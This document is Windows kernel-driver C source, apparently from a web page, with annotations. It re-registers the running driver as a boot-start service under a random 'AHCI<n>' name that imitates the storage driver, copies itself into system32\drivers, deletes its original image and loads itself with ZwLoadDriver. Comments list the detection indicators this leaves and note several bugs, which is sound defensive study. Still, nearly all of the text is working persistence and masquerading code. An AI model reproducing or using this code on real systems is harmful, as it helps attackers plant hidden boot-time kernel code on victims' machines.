LoadDriverRegistry

/*
 * SetLoadDriverRegistry
 *
 * Re-registers the driver that is currently executing (located through
 * DriverObject->DriverSection->FullDllName) as a *new* boot-start service:
 *   1. verifies the driver's own image file can be opened,
 *   2. builds a random service key name of the form
 *      \Registry\Machine\System\CurrentControlSet\Services\AHCI<n>,
 *   3. creates that key and writes Group / ImagePath / DisplayName /
 *      Start (SERVICE_BOOT_START) / Type (SERVICE_KERNEL_DRIVER),
 *   4. copies its own image to \SystemRoot\system32\drivers\AHCI<n>.sys,
 *      deletes the original file, and
 *   5. loads the new service with ZwLoadDriver.
 *
 * Defensive reading: every step above is a host-based indicator. A kernel
 * driver creating a boot-start service at runtime, a Services key whose
 * name mimics a storage driver but was chosen randomly, an ImagePath under
 * system32\drivers that appears at the same moment as the key, and deletion
 * of the image the driver was loaded from, are all worth alerting on
 * (registry-key creation telemetry, file-create/delete telemetry under
 * system32\drivers, and driver-load events).
 *
 * Parameters: DriverObject / RegistryPath as passed to DriverEntry.
 *             RegistryPath is only NULL-checked, never otherwise used.
 * Returns:    NTSTATUS. Note several paths below report STATUS_SUCCESS
 *             even when a step failed (see inline comments).
 * Resources:  NewRegistryPath.Buffer is allocated from NonPagedPool and
 *             is not freed on any path in this function.
 */
//设置LoadDriverRegistry -> set up the LoadDriver registry entry
NTSTATUS SetLoadDriverRegistry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    // Parameter validation
    if (DriverObject == NULL || RegistryPath == NULL)
        return STATUS_UNSUCCESSFUL;
    // Variable definitions
    UNICODE_STRING UnicodeValue;
    UNICODE_STRING SystemRoot;      // declared but unused
    UNICODE_STRING unicodeFilePath;
    ULONG ulValue;
    HANDLE hRegister;
    ULONG ulResult;
    NTSTATUS ntStatus;
    HANDLE hFile = NULL;
    IO_STATUS_BLOCK     ioStatus;
    OBJECT_ATTRIBUTES ObjectAttributes;
    // Static, so these buffers survive across calls and are shared between them.
    static wchar_t szDriverFileName[MAX_PATH] = { 0 };
    static wchar_t szText[MAX_PATH] = { 0 };
    // DriverSection is the loader data-table entry for this driver; its
    // FullDllName is the on-disk path of the running driver image.
    PLDR_DATA_TABLE_ENTRY entry = (PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
    // Open the driver's own image file (attributes only) to make sure it is reachable.
    InitializeObjectAttributes(&ObjectAttributes, &entry->FullDllName, OBJ_KERNEL_HANDLE, NULL, NULL);
    ntStatus = IoCreateFile(&hFile, FILE_READ_ATTRIBUTES, &ObjectAttributes, &ioStatus, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_DELETE, FILE_OPEN, 0, NULL, 0, CreateFileTypeNone, NULL, IO_NO_PARAMETER_CHECKING);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    ZwClose(hFile);
    UNICODE_STRING NewRegistryPath;
    UNICODE_STRING strTemp;
    // Seed a PRNG from the high part of the system time and build a
    // service-key name AHCI<1..10000>; the name is chosen to resemble the
    // legitimate storage driver, which is why it is a detection signal.
    // (The page had "&current_system_time" mangled to "¤t_system_time".)
    LARGE_INTEGER current_system_time = { 0 };
    KeQuerySystemTime(&current_system_time);
    ULONG Seed = current_system_time.HighPart;
    RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\AHCI%d",(RtlRandomEx(&Seed)+1) % 10000);
    RtlInitUnicodeString(&strTemp, szText);
    // Copy the path into a heap buffer so it outlives the reuse of szText below.
    NewRegistryPath.Length = strTemp.Length ;
    NewRegistryPath.MaximumLength = strTemp.MaximumLength ;
    NewRegistryPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, NewRegistryPath.MaximumLength);
    if (NewRegistryPath.Buffer == NULL)
        return STATUS_UNSUCCESSFUL;
    RtlZeroMemory(NewRegistryPath.Buffer, NewRegistryPath.MaximumLength);
    RtlCopyMemory(NewRegistryPath.Buffer, strTemp.Buffer, strTemp.Length);
    // Initialise objectAttributes for the new service key
    InitializeObjectAttributes(&ObjectAttributes, &NewRegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    // Create or open the registry key
    ntStatus = ZwCreateKey(&hRegister, KEY_ALL_ACCESS, &ObjectAttributes, NULL, NULL, REG_OPTION_NON_VOLATILE, &ulResult);
    // Note: a failed key creation returns STATUS_SUCCESS here, so the caller
    // cannot tell that nothing was registered.
    if (hRegister == NULL || ntStatus != STATUS_SUCCESS) return STATUS_SUCCESS;
    ZwClose(hRegister);
    // Group: "Boot Bus Extender" places the service in the earliest load group.
    RtlInitUnicodeString(&UnicodeValue, L"Group");
    ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, L"Boot Bus Extender");
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    // ImagePath
    // Set ImagePath, e.g. system32\\drivers\\HelloWorld.sys
    // wcsrchr(...) + 1 skips the last backslash, i.e. yields the key's leaf name "AHCI<n>".
    RtlStringCbPrintfExW(szDriverFileName, sizeof(szDriverFileName), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"system32\\drivers\\%s.sys", wcsrchr(NewRegistryPath.Buffer, '\\') + sizeof(char));
    RtlInitUnicodeString(&UnicodeValue, L"ImagePath");
    ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, szDriverFileName);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    // Copy the driver image into the system directory under the new name
    RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"\\SystemRoot\\%s",szDriverFileName);
    RtlInitUnicodeString(&unicodeFilePath, szText);
    ntStatus = CopyFile(&entry->FullDllName, &unicodeFilePath);
    if (NT_SUCCESS(ntStatus))
    {
        // Delete the original image file (self-deletion after copy).
        // The result of ZwDeleteFile is not checked; ntStatus is overwritten below.
        OBJECT_ATTRIBUTES ObAttr = { 0 };
        InitializeObjectAttributes(&ObAttr, &entry->FullDllName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
        ntStatus = ZwDeleteFile(&ObAttr);
        //if (!NT_SUCCESS(ntStatus))
        //ForceDeleteFile(&entry->FullDllName);
    }
    // DisplayName = the key's leaf name ("AHCI<n>")
    RtlInitUnicodeString(&UnicodeValue, L"DisplayName");
    RtlStringCbPrintfExW(szText, sizeof(szText), NULL, NULL, STRSAFE_FILL_BEHIND_NULL, L"%s", wcsrchr(NewRegistryPath.Buffer, '\\') + sizeof(char));
    ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_SZ, szText);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    // Start = SERVICE_BOOT_START: loaded by the boot loader before most defences.
    RtlInitUnicodeString(&UnicodeValue, L"Start");
    ulValue = SERVICE_BOOT_START;
    ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_DWORD, &ulValue);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    // Type = SERVICE_KERNEL_DRIVER
    RtlInitUnicodeString(&UnicodeValue, L"Type");
    ulValue = SERVICE_KERNEL_DRIVER;
    ntStatus = SetValueKey(&NewRegistryPath, &UnicodeValue, REG_DWORD, &ulValue);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    // Load the newly registered service immediately.
    ntStatus=ZwLoadDriver(&NewRegistryPath);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;
    return STATUS_SUCCESS;
}

/*
 * SetValueKey
 *
 * Opens the key named by pRegPath and writes one value (pValueName) of
 * type REG_SZ or REG_DWORD.
 *
 * Parameters: pRegPath   - full registry path of the key (must already exist).
 *             pValueName - name of the value to write.
 *             Type       - REG_SZ or REG_DWORD; anything else is rejected.
 *             ValueData  - for REG_SZ a NUL-terminated wide string of at most
 *                          MAX_PATH characters; for REG_DWORD a pointer to a
 *                          ULONG (the caller passes &ulValue through this
 *                          wchar_t[] parameter).
 * Returns:    NTSTATUS from ZwOpenKey / ZwSetValueKey. The parameter and
 *             empty-string checks return FALSE, which is 0 and therefore
 *             equal to STATUS_SUCCESS, so those rejections look like success
 *             to the caller.
 */
//设置注册表键值 -> set a registry value
NTSTATUS SetValueKey(PUNICODE_STRING pRegPath, PUNICODE_STRING pValueName, ULONG Type, wchar_t ValueData[MAX_PATH])
{
    // Parameter validation (returns FALSE == 0 == STATUS_SUCCESS)
    if (pRegPath == NULL || pValueName == 0 || ValueData == NULL)
        return FALSE;
    // Variable definitions
    size_t pcch = 0;
    OBJECT_ATTRIBUTES objectAttribues;
    HANDLE hRegister = NULL;
    NTSTATUS ntstatus=STATUS_UNSUCCESSFUL;
    USHORT cbszSize = 0;
    switch (Type)
    {
    case REG_SZ:
    {
        // Measure the string (bounded by MAX_PATH); pcch is size_t, so
        // "<= 0" only catches the empty string.
        RtlStringCchLengthW(ValueData, MAX_PATH, &pcch);
        if (pcch <= 0)
            return FALSE;
        // Byte size including the terminating NUL.
        cbszSize = (USHORT)(pcch* sizeof(wchar_t)) + sizeof(wchar_t);
    }
    break;
    case REG_DWORD:
    {
        cbszSize = sizeof(ULONG);
    }
    break;
    default:
        return STATUS_UNSUCCESSFUL;
    }
    // Set up object attributes for the key
    InitializeObjectAttributes(&objectAttribues, pRegPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    // Open the registry key
    ntstatus = ZwOpenKey(&hRegister, KEY_ALL_ACCESS, &objectAttribues);
    if (!NT_SUCCESS(ntstatus) || hRegister == NULL)
        return ntstatus;
    // Write the value (REG_SZ or REG_DWORD, per Type)
    ntstatus = ZwSetValueKey(hRegister, pValueName, 0, Type, ValueData, cbszSize);
    if (!NT_SUCCESS(ntstatus))
    {
        // Close the registry handle
        ZwClose(hRegister);
        return ntstatus;
    }
    // Close the registry handle
    ZwClose(hRegister);
    return ntstatus;
}

/*
 * CopyFile
 *
 * Copies lpExistingFileName to lpNewFileName in 0x1000-byte chunks using
 * synchronous ZwReadFile / ZwWriteFile on a shared file offset. The
 * destination is created with FILE_OVERWRITE_IF, so an existing file at
 * that path is replaced. Used above to drop the driver image into
 * system32\drivers, which is the file-system indicator for this routine.
 *
 * Parameters: lpExistingFileName - NT path of the source file.
 *             lpNewFileName      - NT path of the destination file.
 * Returns:    STATUS_SUCCESS when the read loop reaches STATUS_END_OF_FILE;
 *             otherwise the failing NTSTATUS, or STATUS_UNSUCCESSFUL when the
 *             pool allocation fails or a write is short.
 * Resources:  the 0x1000-byte PagedPool buffer and both handles are released
 *             after the do/while(FALSE) block on every path.
 */
//复制文件 -> copy a file
NTSTATUS CopyFile(PUNICODE_STRING lpExistingFileName, PUNICODE_STRING lpNewFileName)
{
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
    OBJECT_ATTRIBUTES ObAttr = { 0 };
    HANDLE hFileSource = NULL;
    HANDLE hFileDest = NULL;
    IO_STATUS_BLOCK IoStatus = { 0 };
    char* pBuff = NULL;
    ULONG Leng = 0;
    LARGE_INTEGER Offset = { 0 };
    // do { ... } while (FALSE) is used as a single-exit block; cleanup follows it.
    do
    {
        pBuff = ExAllocatePoolWithTag(PagedPool, 0x1000, 'Tag');
        if (pBuff == NULL)
            break;
        // Open the source for synchronous reads.
        InitializeObjectAttributes(&ObAttr, lpExistingFileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
        Status = ZwOpenFile(&hFileSource, FILE_READ_DATA, &ObAttr, &IoStatus, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_RANDOM_ACCESS | FILE_SYNCHRONOUS_IO_NONALERT);
        if (!NT_SUCCESS(Status))
        {
            // Note: clears hFileDest (still NULL here), not hFileSource.
            hFileDest = NULL;
            break;
        }
        // Create/overwrite the destination for synchronous writes.
        InitializeObjectAttributes(&ObAttr, lpNewFileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
        Status = ZwCreateFile(&hFileDest, GENERIC_WRITE, &ObAttr, &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_NON_DIRECTORY_FILE | FILE_RANDOM_ACCESS | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
        if (NT_ERROR(Status))
        {
            hFileDest = NULL;
            break;
        }
        // Chunked copy; the same Offset is used for the read and the write.
        do
        {
            Status = ZwReadFile(hFileSource, NULL, NULL, NULL, &IoStatus, pBuff, 0x1000, &Offset, NULL);
            if (NT_ERROR(Status))
            {
                // End of file is the normal termination of the loop.
                if (STATUS_END_OF_FILE == Status)
                {
                    Status = STATUS_SUCCESS;
                }
                break;
            }
            Leng = (ULONG)IoStatus.Information;
            Status = ZwWriteFile(hFileDest, NULL, NULL, NULL, &IoStatus, pBuff, Leng, &Offset, NULL);
            // A short write is treated as failure.
            if (Leng != IoStatus.Information)
            {
                Status = STATUS_UNSUCCESSFUL;
                break;
            }
            Offset.QuadPart += IoStatus.Information;
        } while (NT_SUCCESS(Status));
    } while (FALSE);
    // Cleanup on every path
    if (pBuff)
    {
        ExFreePoolWithTag(pBuff, 'Tag');
        pBuff = NULL;
    }
    if (hFileSource)
    {
        ZwClose(hFileSource);
        hFileSource = NULL;
    }
    if (hFileDest)
    {
        ZwClose(hFileDest);
        hFileDest = NULL;
    }
    return Status;
}
